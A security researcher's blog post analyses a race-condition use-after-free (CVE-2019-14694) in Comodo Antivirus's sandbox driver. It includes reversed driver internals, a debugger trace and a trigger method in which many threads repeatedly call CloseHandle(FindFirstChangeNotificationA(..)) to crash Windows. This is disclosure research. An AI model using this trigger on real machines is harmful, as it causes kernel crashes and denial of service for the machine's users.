Tuesday, August 13, 2019

Comodo Antivirus - Sandbox Race Condition Use-After-Free (CVE-2019-14694)

Hello,
In this blogpost I'm going to share an analysis of a recent finding in yet another Antivirus, this time in Comodo AV. After reading this awesome research by Tenable, I decided to give it a look myself and play a bit with the sandbox.

I ended up finding a vulnerability by accident in the kernel-mode part of the sandbox implemented in the minifilter driver cmdguard.sys. Although the impact is just a BSOD (Blue Screen of Death), I have found the vulnerability quite interesting and worthy of a write-up.

Comodo's sandbox filters file I/O allowing contained processes to read from the volume normally but redirects all writes to '\VTRoot\HarddiskVolume#\' located at the root of the volume on which Windows is installed.

For each file or directory opened (IRP_MJ_CREATE) by a contained process, the preoperation callback allocates an internal structure where multiple fields are initialized.

The callbacks for the minifilter's data queue, a cancel-safe IRP queue, are initialized at offset 0x140 of the structure as the disassembly below shows. In addition, the queue list head is initialized at offset 0x1C0, and the first QWORD of the same struct is set to 0xB5C0B5C0B5C0B5C.


(Figure 1)

Next, a stream handle context is set for the file object and a pointer to the previously discussed internal structure is stored at offset 0x28 of the context.
Keep in mind that a stream handle context is unique per file object (user-mode handle).

(Figure 2)

The only minifilter callback which queues IRPs to the data queue is present in the IRP_MJ_DIRECTORY_CONTROL preoperation callback for the minor function IRP_MN_NOTIFY_CHANGE_DIRECTORY.

Before the IRP_MJ_DIRECTORY_CONTROL checks the minor function, it first verifies whether a stream handle context is available and whether a data queue is already present within. It checks if the pointer at offset 0x28 is valid and whether the magic value 0xB5C0B5C0B5C0B5C is present.


(Figure 3) : Click to Zoom

Before the call to FltCbdqInsertIo, the stream handle context is retrieved and a non-paged pool allocation of size 0xE0 is made of which the pointer is stored in RDI as shown below.


(Figure 4)

Later on, this structure is stored inside the FilterContext array of the FLT_CALLBACK_DATA structure for this request and is passed as a context to the insert routine.

(Figure 5)

FltCbdqInsertIo will eventually call the InsertIoCallback (seen initialized on Figure 1). Examining this routine we see that it queues the callback data structure to the data queue and then invokes FltQueueDeferredIoWorkItem to insert a work item that will be dispatched in a system thread later on.

As you can see from the disassembly below, the work item's dispatch routine (DeferredWorkItemRoutine) receives the newly allocated non-paged memory (Figure 4) as a context.

(Figure 6) : Click To Zoom
Here is a quick recap of what we saw until now :
  • For every file/directory open, a data queue is initialized and stored at offset 0x140 of an internal structure.
  • A context is allocated in which a pointer to the previous structure is stored at offset 0x28. This context is set as a stream handle context.
  • IRP_MJ_DIRECTORY_CONTROL checks if the minor function is IRP_MN_NOTIFY_CHANGE_DIRECTORY.
  • If that's the case, a non-paged pool allocation of size 0xE0 is made and initialized.
  • The allocation is stored inside the FLT_CALLBACK_DATA and is passed to FltCbdqInsertIo as a context.
  • FltCbdqInsertIo ends up calling the insert callback (InsertIoCallback) with the non-paged pool allocation as a context.
  • The insert callback inserts the request into the queue, queues a deferred work item with the same allocation as a context. 
It is very simple for a sandboxed user-mode process to make the minifilter take this code path, it only needs to call the API FindFirstChangeNotificationA on an arbitrary directory.

Let's carry on.

So, the work item's context (non-paged pool allocation made by IRP_MJ_DIRECTORY_CONTROL for the directory change notification request) must be freed somewhere, right ? This is accomplished by IRP_MJ_CLEANUP 's preoperation routine.

As you might already know, IRP_MJ_CLEANUP is sent when the last handle of a file object is closed, so the callback must perform the janitor's work at this stage.

In this instance, The stream handle context is retrieved similarly to what we saw earlier. Next, the queue is disabled so no new requests are queued, and then the queue cleanup is done by "DoCleanup".

(Figure 8)

As shown below this sub-routine dequeues the pended requests from the data queue, retrieves the saved context structure in FLT_CALLBACK_DATA, completes the operation, and then goes on to free the context.

(Figure 9)
We can trigger what we've seen until now from a contained process by :
  • Calling FindFirstChangeNotificationA on an arbitrary directory e.g. "C:\" : Sends IRP_MJ_DIRECTORY_CONTROL and causes the delayed work item to be queued.
  • Closing the handle : Sends IRP_MJ_CLEANUP.
What can go wrong here ? The answer to that is freeing the context before the delayed work item is dispatched which would eventually receive a freed context and use it (use-after-free).

In other words, we have to make the minifilter receive an IRP_MJ_CLEANUP request before the delayed work item queued in IRP_MJ_DIRECTORY_CONTROL is dispatched for execution.

When trying to reproduce the vulnerability with a single thread, I noticed that the work item is always dispatched before IRP_MJ_CLEANUP is received. This makes sense in my opinion since the work item queue doesn't contain many items and dispatching a work item would take less time than all the work the subsequent call to CloseHandle does.

So the idea here was to create multiple threads that infinitely call :
CloseHandle(FindFirstChangeNotificationA(..)) to saturate the work item queue as much as possible and delay the dispatching of work items until the contexts are freed. A crash occurs once a work item accesses a freed context's pool allocation that was corrupted by some new allocation.

Below is the proof of concept to reproduce the vulnerability :



And here is a small Windbg trace to see what happens in practice (inside parentheses is the address of the context) :
    1. [...]
       QueueWorkItem(fffffa8062dc6f20)
       DeferredWorkItem(fffffa8062dc6f20)
       ExFreePoolWithTag(fffffa8062dc6f20)
       [...]
    2. QueueWorkItem(fffffa80635d2ea0)
       ExFreePoolWithTag(fffffa80635d2ea0)
       QueueWorkItem(fffffa8062dd5c10)
       ExFreePoolWithTag(fffffa8062dd5c10)
       QueueWorkItem(fffffa8062dd6890)
       ExFreePoolWithTag(fffffa8062dd6890)
       QueueWorkItem(fffffa8062ddac80)
       ExFreePoolWithTag(fffffa8062ddac80)
       QueueWorkItem(fffffa80624cd5e0)
       [...]
    3. DeferredWorkItem(fffffa80635d2ea0)
In (1.) everything is normal, the work item is queued, dispatched and then the pool allocation it uses is freed.

In (2.) things start going wrong, the work item is queued but before it is dispatched the context is freed.

In (3.) the deferred work item is dispatched with freed and corrupted memory in its context causing an access violation and thus a BSOD.

We see in this case that the freed pool allocation was entirely repurposed and is now part of a file object :

(Figure 10) : Click to Zoom

Reproducing the bug, you will encounter an access violation at this part of the code:

(Figure 11)

And as we can see, it expects multiple pointers to be valid including a resource pointer which makes exploitation non-trivial.

That's all for this article, until next time :)

Follow me on Twitter : here